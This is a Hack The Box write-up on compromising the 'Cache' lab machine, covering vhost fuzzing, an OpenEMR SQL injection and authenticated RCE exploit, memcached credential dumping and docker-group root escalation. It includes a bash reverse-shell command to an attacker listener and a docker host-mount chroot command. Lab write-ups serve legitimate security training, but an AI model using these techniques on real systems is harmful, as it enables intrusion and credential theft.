This is the second write-up of a series on Hack The Box systems penetration tests. If you don’t already know, Hack The Box is a website where you can further your cybersecurity knowledge by hacking into a range of different machines.
Cache is the Linux machine released on May 9th 2020 and no retired yet (9 Aug 2020). The box IP address is 10.10.10.188 and the announced difficulty is medium.
TL;DR
In this box, I wasted a lot of time trying to get an initial foothold, since it’s rare to have to perform so many different scans and search in order to find anything useful. However, once I worked out what I had to do, the box was both fun and interesting.
Part One
First of all, I started by using nmap scan:
Let’s enumerate port 80. It’s the only thing we can do. After some surfing, we see the login page. Here is should be some interesting I thought. Check the files which you requesting for the login page. Inspect Element > Network > functionality.js.
Let’s open this file using simple GET request.
...
function checkCorrectPassword(){
var Password = $("#password").val();
if(Password != 'H@v3_fun'){
alert("Password didn't Match");
error_correctPassword = true;
}
}
function checkCorrectUsername(){
var Username = $("#username").val();
if(Username != "ash"){
alert("Username didn't Match");
error_username = true;
}
}
...
This is credits for web login page. When we log in will see “info page”. HMS is mentioned here.
Okay. Lets try wfuzz to find hms page. But first we’ll use cewl — app which spiders a given url to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers.
$ cewl -w brutedns.txt -d 10 -m 1 http://10.10.10.188/author.html
and then we are using wfuzz or some another bruteforce application.
wfuzz -w brutedns.txt -H “HOST: FUZZ.htb” -u http://10.10.10.188/ — hh 8193
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
********************************************************Target: http://10.10.10.188/
Total requests: 42===================================================================
ID Response Lines Word Chars Payload
===================================================================000000001: 302 0 L 0 W 0 Ch "HMS"Total time: 0.199324
Good. Add hms.htb to /etc/hosts and do GET.
So.. Here is OpenEMR. Check the exploitdb:
Like we see, “OpenEMR < 5.0.1 — (Authenticated) Remote Code Execution” is available. But wee need credits. And I found good video on youtube: https://www.youtube.com/watch?v=DJSQ8Pk_7hc&t=73s. Here is SQL injection available too. It’s pretty. After 5min I have credits:
… and decoding hash:
Username: ‘openemr_admin’, password: ‘xxxxxx’. And now we’re using RCE exploit for OpenEMR. It was mentioned above. Open local listener with netcat and run the exploit:
$ nc -lvnp 4444
$ python openemr_rce.py http://hms.htb/ -u openemr_admin -p xxxxxx -c ‘bash -i >& /dev/tcp/$your_ip/4444 0>&1’
Part Two
Great. We have a low privilege shell on the box. Lets try “su ash” with password from functionality.js.
Part Three
Memcached exploit
Lets check locally running services:
If you google 11211 port you’ll see that this is memcached. Here is some examples of memcached exploitation:
https://www.hackingarticles.in/penetration-testing-on-memcached-server/
https://niiconsulting.com/checkmate/2013/05/memcache-exploit/
Okay. Execute “telnet 127.0.0.1 11211" on remote machine and then “stats cachedump 1 0”. You should see something like this:
After that execute “get user”, “get passwd” and ssh to the box.
Root exploitation
If you execute ‘id’ command you’ll see that luffy belongs to the group of users of docker. Okay. Check GTFObins for docker. Lets exploit itlike there.
$ docker images
$ docker run -v /:/mnt — rm -it ubuntu chroot /mnt bash
Congratulation we owned CACHE! Hope you had as much fun rooting this box as I did! Have a great day!